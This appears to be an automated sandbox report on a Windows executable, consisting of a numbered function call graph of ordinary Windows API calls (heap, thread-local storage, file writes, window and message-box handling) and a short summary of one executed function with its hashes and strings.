2 API calls 7932->7933 7934 140010d5b 7933->7934 8197 140014af0 8199 140014b26 8197->8199 8200 140014b12 8197->8200 8198 140014d80 3 API calls 8198->8199 8200->8198 8200->8199 7397 14000e3f0 7398 14000e4ee 7397->7398 7399 14000e40a 7397->7399 7399->7398 7400 14000e483 7399->7400 7401 14000e41a 7399->7401 7414 14000e770 WideCharToMultiByte 7400->7414 7403 14000e451 7401->7403 7404 14000e425 7401->7404 7403->7403 7405 14000e45d WriteFile 7403->7405 7409 14000e620 5 API calls 7404->7409 7407 14000e4c5 WriteFile 7411 14000e4dc HeapFree 7407->7411 7408 14000e4b7 7418 14000e620 7408->7418 7412 14000e445 7409->7412 7411->7398 7413 14000e4bf 7413->7411 7415 14000e7b9 HeapAlloc 7414->7415 7416 14000e4a0 7414->7416 7415->7416 7417 14000e7d8 WideCharToMultiByte 7415->7417 7416->7398 7416->7407 7416->7408 7417->7416 7419 14000e644 7418->7419 7420 14000e75e 7418->7420 7421 14000e673 7419->7421 7422 14000e64a SetFilePointer 7419->7422 7420->7413 7423 14000e67e 7421->7423 7424 14000e6ff 7421->7424 7422->7421 7425 14000e6b7 7423->7425 7428 14000e699 memmove 7423->7428 7431 14000ddc0 7424->7431 7425->7413 7427 14000e707 7429 14000e711 WriteFile 7427->7429 7430 14000e739 memmove 7427->7430 7428->7413 7429->7413 7430->7413 7432 14000de04 7431->7432 7433 14000ddd4 WriteFile 7431->7433 7432->7427 7433->7427 7568 14000e1f0 7569 1400112a8 5 API calls 7568->7569 7570 14000e21b 7569->7570 7571 14000e227 CreateFileW 7570->7571 7572 14000e27f 7570->7572 7571->7572 7573 14000e25c 7571->7573 7573->7572 7574 14000e267 HeapAlloc 7573->7574 7574->7572 7579 1400113f8 EnterCriticalSection 7580 140011423 LeaveCriticalSection 7579->7580 7935 140016c77 7936 140016c89 TlsFree 7935->7936 7937 140016cbf 7935->7937 7939 140016c97 7936->7939 7938 140016cab DeleteCriticalSection 7938->7937 7939->7938 8201 14000d8f8 8202 14000d908 8201->8202 8203 14000d90d 8201->8203 8205 140011a50 8202->8205 8206 140011a81 8205->8206 8207 140011a60 8205->8207 8206->8203 8211 140011c48 EnterCriticalSection 8207->8211 8209 140011a65 8209->8206 8212 140011bdc 8209->8212 8211->8209 8213 140011be7 8212->8213 8214 140011c3c 8213->8214 8215 140011c32 LeaveCriticalSection 8213->8215 8214->8209 8215->8214 7393 140010ffc 7394 140011009 7393->7394 7395 14001101f 7393->7395 7394->7395 7396 140011013 TlsFree 7394->7396 7396->7395 8338 140010b7c 8339 140010b85 memset 8338->8339 8340 140010b8d 8338->8340 8339->8340 8341 14000477e 8342 140012360 HeapFree 8341->8342 8343 140004790 8342->8343 8344 140012360 HeapFree 8343->8344 8345 1400047a2 8344->8345 8346 140012360 HeapFree 8345->8346 8347 1400047b4 8346->8347 8348 140012360 HeapFree 8347->8348 8349 1400047c6 8348->8349 8350 140012360 HeapFree 8349->8350 8351 1400047d8 8350->8351 7434 140001000 7435 14000101d 7434->7435 7486 140012060 HeapCreate TlsAlloc 7435->7486 7437 14000105b 7489 14000de20 7437->7489 7439 140001065 7492 14000c980 HeapCreate 7439->7492 7441 140001074 7493 14000c07c 7441->7493 7443 140001079 7444 14000b538 memset InitCommonControlsEx CoInitialize 7443->7444 7445 14000107e 7444->7445 7446 140007160 InitializeCriticalSection 7445->7446 7447 140001083 7446->7447 7448 1400120d0 HeapAlloc HeapReAlloc HeapFree 7447->7448 7449 1400010a3 7448->7449 7450 14000ccd8 32 API calls 7449->7450 7451 1400010e6 7450->7451 7452 14000d524 16 API calls 7451->7452 7453 1400010fa 7452->7453 7454 14000d444 11 API calls 7453->7454 7455 14000111e 7454->7455 7456 14000d524 16 API calls 7455->7456 7457 14000112a 7456->7457 7458 14000d444 11 API calls 7457->7458 7459 14000114e 7458->7459 7460 140011d30 HeapAlloc memset HeapFree HeapFree 7459->7460 7461 140001185 7460->7461 7462 1400120d0 HeapAlloc HeapReAlloc HeapFree 7461->7462 7463 1400011a6 7462->7463 7464 14000d524 16 API calls 7463->7464 7465 1400011b2 7464->7465 7466 14000d444 11 API calls 7465->7466 7467 1400011d6 7466->7467 7468 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 7467->7468 7469 1400011e5 7468->7469 7470 1400121c0 GetLastError TlsGetValue SetLastError 7469->7470 7471 1400011ef 7470->7471 7472 1400121c0 GetLastError TlsGetValue SetLastError 7471->7472 7473 1400011ff 7472->7473 7474 140004211 31 API calls 7473->7474 7475 14000120e 7474->7475 7476 140012210 TlsGetValue HeapAlloc HeapReAlloc 7475->7476 7477 14000121f 7476->7477 7478 1400021ea 50 API calls 7477->7478 7479 140001224 7478->7479 7480 140001236 7479->7480 7481 14000433f 188 API calls 7479->7481 7482 14000593c 232 API calls 7480->7482 7481->7480 7483 14000123b 7482->7483 7484 1400120a0 HeapDestroy TlsFree 7483->7484 7485 140001245 HeapDestroy ExitProcess 7484->7485 7498 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7486->7498 7488 14001208c 7488->7437 7499 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7489->7499 7491 14000de38 7491->7439 7492->7441 7500 1400110dc 7493->7500 7497 14000c0a8 InitializeCriticalSection 7498->7488 7499->7491 7501 1400110fd 7500->7501 7502 140011112 TlsAlloc HeapAlloc TlsSetValue 7501->7502 7503 140011149 TlsGetValue HeapReAlloc TlsSetValue 7501->7503 7502->7503 7504 140011198 7503->7504 7505 14000c08d 7504->7505 7508 140011cb0 HeapAlloc 7504->7508 7507 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7505->7507 7507->7497 7509 140011cd3 7508->7509 7509->7505 7582 140007a00 7585 140007a50 7582->7585 7586 140007a79 7585->7586 7607 140012630 TlsGetValue 7586->7607 7589 140012630 TlsGetValue 7590 140007a9c 7589->7590 7609 1400126d0 TlsGetValue 7590->7609 7593 140007abf 7599 140007acf 7593->7599 7614 1400127f0 TlsGetValue 7593->7614 7596 140007c35 7615 1400128a0 TlsGetValue 7596->7615 7598 140007a1c 7599->7596 7599->7599 7600 140007b20 HeapAlloc 7599->7600 7601 140007b50 7599->7601 7600->7601 7601->7601 7602 140007b91 wcsncpy 7601->7602 7605 140007bac 7601->7605 7602->7605 7603 140007c02 7603->7596 7604 140007c09 HeapFree 7603->7604 7604->7596 7605->7603 7606 140007bdf wcsncpy 7605->7606 7606->7603 7608 140007a92 7607->7608 7608->7589 7610 1400126f4 7609->7610 7611 14001272d HeapReAlloc 7610->7611 7612 140007ab1 7610->7612 7611->7612 7612->7593 7613 1400127f0 TlsGetValue 7612->7613 7613->7593 7614->7599 7615->7598 7616 140008200 7619 140008260 7616->7619 7620 1400082e4 7619->7620 7621 140008397 7620->7621 7632 14000830a 7620->7632 7623 140012630 TlsGetValue 7621->7623 7622 140008221 7624 14000839f 7623->7624 7625 1400083ba 7624->7625 7626 1400083aa _wcsdup 7624->7626 7627 140012630 TlsGetValue 7625->7627 7626->7625 7628 1400083c2 7627->7628 7629 1400083d8 7628->7629 7630 1400083cd _wcsdup 7628->7630 7631 140012630 TlsGetValue 7629->7631 7630->7629 7633 1400083e0 7631->7633 7632->7622 7634 140008363 wcsncpy 7632->7634 7635 1400083eb _wcsdup 7633->7635 7636 1400083f8 7633->7636 7634->7632 7635->7636 7636->7636 7637 1400126d0 2 API calls 7636->7637 7638 140008481 7637->7638 7639 1400084ed wcsncpy 7638->7639 7640 140008488 7638->7640 7641 14000850e 7638->7641 7639->7641 7642 140008575 7640->7642 7643 14000856d free 7640->7643 7641->7640 7647 1400085c0 wcsncpy 7641->7647 7644 140008587 7642->7644 7645 14000857f free 7642->7645 7643->7642 7644->7622 7646 140008591 free 7644->7646 7645->7644 7646->7622 7647->7641 7946 14000d881 7947 14000d89d 7946->7947 7948 14000d8dc 7946->7948 7947->7948 7951 14000d8af 7947->7951 7953 14000d60c 7947->7953 7951->7948 7960 14000d6a0 7951->7960 7965 140016538 7951->7965 7954 14000d656 7953->7954 7955 14000d62f 7953->7955 7956 14000d654 7954->7956 7957 1400116f4 3 API calls 7954->7957 7955->7956 7958 1400168c0 HeapFree 7955->7958 7974 1400116f4 7955->7974 7956->7951 7957->7954 7958->7955 7961 14001147c 4 API calls 7960->7961 7962 14000d6b6 7961->7962 7963 14000d6c2 memset 7962->7963 7964 14000d6d6 7962->7964 7963->7964 7964->7951 7966 1400168b7 7965->7966 7971 140016541 7965->7971 7966->7951 7967 1400168b2 memmove 7967->7966 7968 140016860 memmove 7968->7971 7969 140016895 7969->7966 7969->7967 7970 140016538 wcslen HeapAlloc HeapFree 7970->7971 7971->7968 7971->7969 7971->7970 7972 140012360 HeapFree 7971->7972 7981 1400122f0 7971->7981 7972->7971 7975 14001170a EnterCriticalSection 7974->7975 7976 140011714 7974->7976 7975->7976 7979 14001177b HeapFree 7976->7979 7980 140011794 7976->7980 7977 1400117f1 7977->7955 7978 1400117e7 LeaveCriticalSection 7978->7977 7979->7980 7980->7977 7980->7978 7982 140012351 7981->7982 7983 140012306 wcslen HeapAlloc 7981->7983 7982->7971 7985 140012820 7983->7985 7986 140012845 7985->7986 7986->7982 8224 140013507 8225 14001350c 8224->8225 8226 140014d80 3 API calls 8225->8226 8227 1400134ee 8225->8227 8226->8227 7648 140011e0c 7650 140011e56 7648->7650 7651 140011ec4 7650->7651 7652 140011d30 7650->7652 7658 140011ef4 7652->7658 7655 140011d6e HeapAlloc 7656 140011d90 memset 7655->7656 7657 140011dc6 7655->7657 7656->7657 7657->7651 7659 140011d69 7658->7659 7662 140011ef9 7658->7662 7659->7655 7659->7657 7660 140011f38 HeapFree 7660->7659 7662->7660 7663 1400168c0 7662->7663 7665 1400168da 7663->7665 7664 1400169fd 7664->7662 7665->7664 7666 1400168c0 HeapFree 7665->7666 7667 140012360 HeapFree 7665->7667 7666->7665 7667->7665 7668 14000bc0c 7669 14000bc19 EnableWindow 7668->7669 7670 14000bc2b 7668->7670 7669->7670 7671 140014810 7672 14001482a 7671->7672 7673 140014869 7671->7673 7672->7673 7674 14001483f memmove memmove 7672->7674 7674->7673 7675 140016410 malloc 8356 140012390 HeapFree HeapFree 7987 14000c490 7992 14000c6e0 7987->7992 7990 14000c4c6 7991 14000c4ab GetCurrentProcess TerminateProcess 7991->7990 7995 14000c4f0 7992->7995 7996 14000c510 7995->7996 7996->7996 7997 14000c562 RtlLookupFunctionEntry 7996->7997 7998 14000c5b4 RtlLookupFunctionEntry 7997->7998 8000 14000c5f3 7997->8000 7998->8000 8001 14000c499 7998->8001 7999 14000c61b RtlVirtualUnwind 7999->8000 7999->8001 8000->7999 8000->8001 8002 14000c664 RtlLookupFunctionEntry 8000->8002 8001->7990 8001->7991 8002->8000 8002->8001 8228 140002914 8229 140012360 HeapFree 8228->8229 8230 140002926 8229->8230 8003 140012e97 8004 140012ead 8003->8004 8006 140012ea0 8003->8006 8005 140014d80 3 API calls 8004->8005 8004->8006 8005->8006 7676 14000281c 7683 140012600 TlsGetValue 7676->7683 7678 140002821 7679 140012360 HeapFree 7678->7679 7680 140002835 7679->7680 7681 140012360 HeapFree 7680->7681 7682 140002847 7681->7682 7683->7678 7684 140016420 free 8231 140017120 8232 1400171ae malloc 8231->8232 8233 140017140 MultiByteToWideChar 8231->8233 8234 1400171bc 8232->8234 8233->8232 8236 14001716d malloc MultiByteToWideChar 8233->8236 8236->8234 8007 14000bea0 GetWindowThreadProcessId GetCurrentThreadId 8008 14000bf31 8007->8008 8009 14000bec1 IsWindowVisible 8007->8009 8009->8008 8010 14000bece 8009->8010 8011 140011cb0 HeapAlloc 8010->8011 8012 14000bedf GetCurrentThreadId GetWindowLongPtrW 8011->8012 8013 14000bf06 8012->8013 8014 14000bf0a GetForegroundWindow 8012->8014 8013->8014 8014->8008 8015 14000bf15 IsWindowEnabled 8014->8015 8015->8008 8016 14000bf22 EnableWindow 8015->8016 8016->8008 7685 140013021 7687 140013026 7685->7687 7686 140014d80 3 API calls 7689 140012f79 7686->7689 7688 1400132aa memmove 7687->7688 7687->7689 7690 1400132ba 7687->7690 7688->7690 7690->7686 7690->7689 8017 1400034a2 8030 140012600 TlsGetValue 8017->8030 8019 1400034a7 8020 140012360 HeapFree 8019->8020 8021 1400034bb 8020->8021 8022 140012360 HeapFree 8021->8022 8023 1400034cd 8022->8023 8024 140012360 HeapFree 8023->8024 8025 1400034df 8024->8025 8026 140012360 HeapFree 8025->8026 8027 1400034f1 8026->8027 8028 140012360 HeapFree 8027->8028 8029 140003503 8028->8029 8030->8019 7691 140011024 7692 140011032 TlsFree 7691->7692 7693 14001103e 7691->7693 7692->7693 7694 14000e824 7695 14000e8e4 7694->7695 7703 14000fee4 7695->7703 7704 14000ff0b 7703->7704 7705 14000ff92 7704->7705 7706 14000ff47 memmove 7704->7706 7710 14000ea48 7706->7710 7708 14000ea48 memmove 7709 14000ff70 7708->7709 7709->7705 7709->7708 7711 14000ea81 7710->7711 7712 14000ea71 memmove 7710->7712 7711->7709 7712->7711 8375 140010fa8 8376 140010fbe 8375->8376 8377 140010fdd HeapFree 8376->8377 8378 140010fef 8376->8378 8377->8378 8379 1400021a8 8380 1400021ab 8379->8380 8381 140012360 HeapFree 8380->8381 8382 1400021ba 8381->8382 8383 140012360 HeapFree 8382->8383 8384 1400021cc 8383->8384 8385 140012360 HeapFree 8384->8385 8386 1400021de 8385->8386 7713 14001162c 7718 14001147c 7713->7718 7716 140011646 memset 7717 140011659 7716->7717 7719 1400114a4 7718->7719 7720 14001149a EnterCriticalSection 7718->7720 7721 14001155e HeapAlloc 7719->7721 7725 1400114b1 7719->7725 7720->7719 7722 140011586 HeapAlloc 7721->7722 7721->7725 7722->7725 7723 140011606 7723->7716 7723->7717 7724 1400115fc LeaveCriticalSection 7724->7723 7725->7723 7725->7724 7726 14000b62c 7727 14000b635 HeapFree 7726->7727 7728 14000b647 7726->7728 7727->7728 8040 1400040ac 8041 1400123e0 21 API calls 8040->8041 8042 1400040ce 8041->8042 8043 14000d6a0 5 API calls 8042->8043 8044 1400040da 8043->8044 8053 1400121c0 GetLastError TlsGetValue SetLastError 8044->8053 8046 1400040e4 8054 1400121c0 GetLastError TlsGetValue SetLastError 8046->8054 8048 1400040f8 8055 14000ca00 8048->8055 8052 140004122 8053->8046 8054->8048 8056 14000ca20 8055->8056 8057 1400126d0 2 API calls 8056->8057 8058 14000ca34 8057->8058 8059 14000ca3b memmove 8058->8059 8060 14000410d 8058->8060 8059->8060 8061 140012210 TlsGetValue 8060->8061 8062 140012251 HeapAlloc 8061->8062 8063 140012276 HeapReAlloc 8061->8063 8064 1400122a1 8062->8064 8063->8064 8064->8052 8237 14000432e 8240 140012600 TlsGetValue 8237->8240 8239 140004333 8240->8239 7729 140011a30 InitializeCriticalSection 8065 1400136b0 8066 1400136bf 8065->8066 8067 140013750 memmove 8066->8067 8068 140014393 8066->8068 8070 14001378b 8066->8070 8067->8070 8069 140014d80 3 API calls 8068->8069 8068->8070 8069->8070 8241 140016f30 8242 140016f60 8241->8242 8242->8242 8243 140016f6b MultiByteToWideChar 8242->8243 8244 1400126d0 2 API calls 8243->8244 8245 140016f97 MultiByteToWideChar 8244->8245 7538 14000c6b0 7539 14000c6d1 7538->7539 7540 14000c6c0 RemoveVectoredExceptionHandler 7538->7540 7540->7539 7730 140007a30 7731 140007a50 9 API calls 7730->7731 7732 140007a49 7731->7732 7733 140008230 7734 140008260 12 API calls 7733->7734 7735 140008251 7734->7735 8071 140008eb5 8072 140008ee3 8071->8072 8073 140008ec9 8071->8073 8076 140008ed4 8072->8076 8087 14000afc0 8072->8087 8073->8076 8077 140009da0 8073->8077 8078 140009dc9 8077->8078 8080 140009e0d 8077->8080 8097 14000b510 8078->8097 8080->8080 8081 140009da0 _wcsicmp 8080->8081 8084 140009de0 8080->8084 8082 140009e66 8081->8082 8083 140009da0 _wcsicmp 8082->8083 8086 140009e79 8083->8086 8084->8076 8085 14000b510 _wcsicmp 8085->8086 8086->8084 8086->8085 8088 14000afe9 8087->8088 8090 14000b02d 8087->8090 8089 14000b510 _wcsicmp 8088->8089 8094 14000b000 8089->8094 8090->8090 8091 14000afc0 _wcsicmp 8090->8091 8090->8094 8092 14000b086 8091->8092 8093 14000afc0 _wcsicmp 8092->8093 8096 14000b099 8093->8096 8094->8076 8095 14000b510 _wcsicmp 8095->8096 8096->8094 8096->8095 8098 14000b524 8097->8098 8099 14000b515 8097->8099 8098->8084 8100 1400070cc _wcsicmp 8099->8100 8101 14000b51e 8099->8101 8100->8084 8100->8097 8101->8084 8246 140014535 8247 14001455a 8246->8247 8247->8247 8248 140014779 memmove 8247->8248 8249 1400145dc 8247->8249 8248->8249 7736 14000bc38 7737 14000bc84 7736->7737 7738 14000bc4c 7736->7738 7738->7737 7739 14000bc51 SendMessageW Sleep PostMessageW 7738->7739 7739->7737 7744 14000e83b HeapAlloc 7745 14000e87d 7744->7745 7746 14000303f 7757 140012600 TlsGetValue 7746->7757 7748 140003044 7749 140012360 HeapFree 7748->7749 7750 140003058 7749->7750 7751 140012360 HeapFree 7750->7751 7752 14000306a 7751->7752 7753 140012360 HeapFree 7752->7753 7754 14000307c 7753->7754 7755 140012360 HeapFree 7754->7755 7756 14000308e 7755->7756 7757->7748 7758 14000c040 7763 140011248 EnterCriticalSection 7758->7763 7761 14000c075 7762 14000c05d CloseHandle 7762->7761 7764 14001127a LeaveCriticalSection 7763->7764 7765 14001126c 7763->7765 7766 14000c058 7764->7766 7765->7764 7766->7761 7766->7762 8102 1400048c0 8111 140012600 TlsGetValue 8102->8111 8104 1400048c5 8105 140012360 HeapFree 8104->8105 8106 1400048d9 8105->8106 8107 140012360 HeapFree 8106->8107 8108 1400048eb 8107->8108 8109 140012360 HeapFree 8108->8109 8110 1400048fd 8109->8110 8111->8104 8250 14000e540 8251 140011248 2 API calls 8250->8251 8252 14000e55f 8251->8252 8253 14000b740 8256 14000b758 8253->8256 8296 14000b5d8 8256->8296 8258 14000b790 8259 14000b5d8 2 API calls 8258->8259 8260 14000b79b 8259->8260 8261 14000b5d8 2 API calls 8260->8261 8262 14000b7a6 8261->8262 8263 14000b7b2 GetStockObject 8262->8263 8264 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 8262->8264 8263->8264 8265 14000be5c 3 API calls 8264->8265 8266 14000b83f 8265->8266 8267 14000bf44 7 API calls 8266->8267 8268 14000b84d 8267->8268 8269 14000b859 IsWindowEnabled 8268->8269 8270 14000b87a 8268->8270 8269->8270 8271 14000b863 EnableWindow 8269->8271 8272 14000be5c 3 API calls 8270->8272 8271->8270 8273 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 8272->8273 8274 14000b902 6 API calls 8273->8274 8275 14000bb96 8273->8275 8276 14000ba12 SendMessageW wcslen wcslen SendMessageW 8274->8276 8277 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8274->8277 8278 14000bba4 8275->8278 8299 1400127b0 TlsGetValue 8275->8299 8276->8277 8281 14000bb48 8277->8281 8279 14000bba9 HeapFree 8278->8279 8280 14000bbbb 8278->8280 8279->8280 8283 14000bbd2 8280->8283 8284 14000bbc0 HeapFree 8280->8284 8285 14000bb51 8281->8285 8286 14000bb0a GetMessageW 8281->8286 8288 14000bbd7 HeapFree 8283->8288 8289 14000b751 8283->8289 8284->8283 8290 14000bb56 DestroyAcceleratorTable 8285->8290 8291 14000bb5f 8285->8291 8286->8285 8287 14000bb20 TranslateAcceleratorW 8286->8287 8287->8281 8292 14000bb34 TranslateMessage DispatchMessageW 8287->8292 8288->8289 8290->8291 8291->8275 8293 14000bb68 wcslen 8291->8293 8292->8281 8294 1400126d0 2 API calls 8293->8294 8295 14000bb77 wcscpy HeapFree 8294->8295 8295->8275 8297 14000b5ea wcslen HeapAlloc 8296->8297 8298 14000b60e 8296->8298 8297->8298 8298->8258 8299->8278 7767 14000c444 7768 14000c455 7767->7768 7769 14000c44d SetEnvironmentVariableW 7767->7769 7769->7768 8112 14000cec4 8113 14000cf4b 8112->8113 8114 14000cee9 8112->8114 8114->8113 8116 14000cf02 8114->8116 8120 14000d140 8114->8120 8116->8113 8119 140016538 5 API calls 8116->8119 8127 14000d1f0 8116->8127 8136 14000d02c 8116->8136 8119->8116 8121 14000d15b 8120->8121 8122 14000d1b4 memset 8121->8122 8123 14000d163 HeapFree 8121->8123 8125 1400168c0 HeapFree 8121->8125 8126 1400116f4 3 API calls 8121->8126 8124 14000d1d0 8122->8124 8123->8121 8124->8116 8125->8121 8126->8121 8128 14000d230 8127->8128 8130 14000d210 8127->8130 8129 14001147c 4 API calls 8128->8129 8135 14000d22e 8129->8135 8130->8128 8131 14000d21d 8130->8131 8133 1400168c0 HeapFree 8131->8133 8131->8135 8132 14000d295 8132->8116 8133->8135 8134 14000d281 memset 8134->8132 8135->8132 8135->8134 8137 14000d073 8136->8137 8138 14000d04c 8136->8138 8142 14000d08f 8137->8142 8157 14000d3a4 8137->8157 8151 14000cf74 8138->8151 8141 14000d051 8141->8137 8143 14000d059 8141->8143 8144 14001147c 4 API calls 8142->8144 8145 14000d06e 8143->8145 8149 1400168c0 HeapFree 8143->8149 8146 14000d0a6 8144->8146 8147 14000d11c 8145->8147 8148 14000d108 memset 8145->8148 8146->8147 8150 14000d0ae wcslen HeapAlloc wcscpy 8146->8150 8147->8116 8148->8147 8149->8145 8150->8145 8152 14000cfa2 8151->8152 8154 14000cfe2 8151->8154 8153 14000d3a4 tolower 8152->8153 8155 14000cfa7 8153->8155 8154->8155 8156 14000cff8 wcscmp 8154->8156 8155->8141 8156->8154 8156->8155 8158 14000d3c7 tolower 8157->8158 8159 14000d3b8 8158->8159 8160 14000d3d0 8158->8160 8159->8158 8160->8142 8300 140003144 8301 140003147 8300->8301 8302 140012360 HeapFree 8301->8302 8303 140003156 8302->8303 8304 140012360 HeapFree 8303->8304 8305 140003168 8304->8305 7770 140002648 7771 14000264f 7770->7771 7772 140012360 HeapFree 7771->7772 7773 140002666 7772->7773 7774 140012360 HeapFree 7773->7774 7775 140002678 7774->7775 7776 140012360 HeapFree 7775->7776 7777 14000268a 7776->7777 7778 140012360 HeapFree 7777->7778 7779 14000269c 7778->7779 7780 140012360 HeapFree 7779->7780 7781 1400026ae 7780->7781 8161 1400088c9 8162 1400088e0 8161->8162 8163 1400088fa 8161->8163 8164 140009da0 _wcsicmp 8162->8164 8166 1400088eb 8162->8166 8165 14000afc0 _wcsicmp 8163->8165 8163->8166 8164->8166 8165->8166 7782 14000b64c 7783 14000b667 7782->7783 7784 14000b70e UnregisterClassW 7782->7784 7785 14000b68b 7783->7785 7787 14000b674 DefWindowProcW 7783->7787 7788 14000b67f 7783->7788 7786 14000b72c 7784->7786 7785->7786 7789 14000b6ea EnableWindow 7785->7789 7790 14000b6fc 7785->7790 7787->7786 7788->7785 7791 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 7788->7791 7789->7790 7794 14000bf44 7790->7794 7791->7785 7795 14000bf57 EnumWindows 7794->7795 7796 14000bfbb 7794->7796 7798 14000b703 DestroyWindow 7795->7798 7799 14000bf77 GetCurrentThreadId 7795->7799 7797 14000bfc7 GetCurrentThreadId 7796->7797 7796->7798 7801 14000bfdb EnableWindow 7796->7801 7803 14000bff0 SetWindowPos 7796->7803 7805 140011c68 7796->7805 7797->7796 7798->7786 7800 14000bf85 7799->7800 7800->7798 7800->7799 7802 14000bf8b SetWindowPos 7800->7802 7801->7796 7802->7800 7803->7796 7806 140011c74 HeapFree 7805->7806 7808 14001f820 7806->7808 8167 1400130cb 8169 1400130d0 8167->8169 8168 140014d80 3 API calls 8172 140013480 8168->8172 8170 1400132ba 8169->8170 8171 1400132aa memmove 8169->8171 8170->8168 8170->8172 8171->8170 8306 140002b4c 8307 1400123e0 21 API calls 8306->8307 8308 140002b6a 8307->8308 8391 140016fd0 8392 140017000 8391->8392 8392->8392 8393 14001700b MultiByteToWideChar malloc MultiByteToWideChar 8392->8393 7510 14000de50 7528 1400112a8 EnterCriticalSection 7510->7528 7512 14000de98 7513 14000deb6 7512->7513 7514 14000defb 7512->7514 7522 14000e04d 7512->7522 7515 14000dec9 7513->7515 7516 14000decd CreateFileW 7513->7516 7517 14000df42 7514->7517 7518 14000df00 7514->7518 7515->7516 7524 14000dfb7 7516->7524 7521 14000df5f CreateFileW 7517->7521 7517->7524 7519 14000df13 7518->7519 7520 14000df17 CreateFileW 7518->7520 7519->7520 7520->7524 7523 14000df8d CreateFileW 7521->7523 7521->7524 7523->7524 7524->7522 7525 14000dfe1 HeapAlloc 7524->7525 7526 14000dff9 7524->7526 7525->7526 7526->7522 7527 14000e036 SetFilePointer 7526->7527 7527->7522 7529 1400112e3 7528->7529 7530 1400112d0 7528->7530 7531 140011312 7529->7531 7532 1400112e9 HeapReAlloc 7529->7532 7533 140011cb0 HeapAlloc 7530->7533 7535 14001132d HeapAlloc 7531->7535 7537 14001131d 7531->7537 7532->7531 7534 1400112de 7533->7534 7536 140011352 LeaveCriticalSection 7534->7536 7535->7537 7536->7512 7537->7536 8173 1400086d0 8174 140008701 8173->8174 8175 1400086ee 8173->8175 8176 140008710 CharLowerW CharLowerW 8174->8176 8177 14000873e 8174->8177 8176->8174 8176->8177 7809 140002853 7830 1400123e0 7809->7830 7813 14000286b 7843 1400121c0 GetLastError TlsGetValue SetLastError 7813->7843 7815 140002889 7844 140012450 7815->7844 7817 140002898 7849 1400121c0 GetLastError TlsGetValue SetLastError 7817->7849 7819 1400028a6 7850 1400121c0 GetLastError TlsGetValue SetLastError 7819->7850 7821 1400028ba 7851 14000c8e0 7821->7851 7825 1400028d4 7856 1400125d0 TlsGetValue 7825->7856 7827 1400028e5 7857 14000b574 7827->7857 7829 1400028fb 7831 1400123ed 7830->7831 7832 14001240f TlsGetValue 7830->7832 7835 140012060 5 API calls 7831->7835 7833 140002861 7832->7833 7834 140012420 7832->7834 7842 1400121c0 GetLastError TlsGetValue SetLastError 7833->7842 7873 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7834->7873 7836 1400123f2 TlsGetValue 7835->7836 7864 140016cc4 7836->7864 7839 140012425 TlsGetValue 7841 140016cc4 13 API calls 7839->7841 7841->7833 7842->7813 7843->7815 7845 140012477 7844->7845 7846 140012469 wcslen 7844->7846 7847 1400126d0 2 API calls 7845->7847 7846->7845 7848 140012485 7847->7848 7848->7817 7849->7819 7850->7821 7852 14000c8f0 7851->7852 7853 1400126d0 2 API calls 7852->7853 7854 1400028ca 7853->7854 7855 140012520 TlsGetValue 7854->7855 7855->7825 7856->7827 7874 14000be5c GetForegroundWindow 7857->7874 7860 14000bf44 7 API calls 7861 14000b5a3 MessageBoxW 7860->7861 7862 14000bf44 7 API calls 7861->7862 7863 14000b5bf 7862->7863 7863->7829 7865 140016cf2 TlsAlloc InitializeCriticalSection 7864->7865 7866 140016d11 TlsGetValue 7864->7866 7865->7866 7867 140016de6 HeapAlloc 7866->7867 7868 140016d29 HeapAlloc 7866->7868 7869 14001240d 7867->7869 7868->7869 7870 140016d49 EnterCriticalSection 7868->7870 7869->7833 7871 140016d61 7 API calls 7870->7871 7872 140016d5e 7870->7872 7871->7867 7872->7871 7873->7839 7875 14000b596 7874->7875 7876 14000be76 GetWindowThreadProcessId GetCurrentProcessId 7874->7876 7875->7860 7876->7875 8394 1400031d9 8395 1400031dc 8394->8395 8396 140012360 HeapFree 8395->8396 8397 1400031eb 8396->8397 8398 14000c3dc GetEnvironmentVariableW 8399 14000c408 8398->8399 8400 1400126d0 2 API calls 8399->8400 8401 14000c413 GetEnvironmentVariableW 8400->8401 8178 1400076e0 8179 14000773d 8178->8179 8181 1400076f1 8178->8181 8180 140007729 wcsstr 8180->8179 8181->8179 8181->8180 8315 140007760 8316 1400077e7 8315->8316 8317 140007769 8315->8317 8317->8316 8318 1400077b9 8317->8318 8319 1400077c0 wcsstr 8317->8319 8322 1400085f0 8318->8322 8321 1400077be 8319->8321 8323 14000869f 8322->8323 8324 140008617 CharLowerW 8322->8324 8323->8321 8325 140008630 8324->8325 8325->8323 8325->8325 8326 14000864c CharLowerW 8325->8326 8327 140008670 CharLowerW CharLowerW 8325->8327 8326->8325 8327->8325

                                                              Executed Functions

                                                              Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000030.00000002.2343292400.0000000140001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000030.00000002.2343277027.0000000140000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343313042.0000000140018000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343329971.000000014001F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000030.00000002.2343345689.0000000140022000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_48_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
                                                              • String ID: GetLongPathNameW$Kernel32.DLL
                                                              • API String ID: 820969696-2943376620
                                                              • Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
                                                              • Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
                                                              • Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
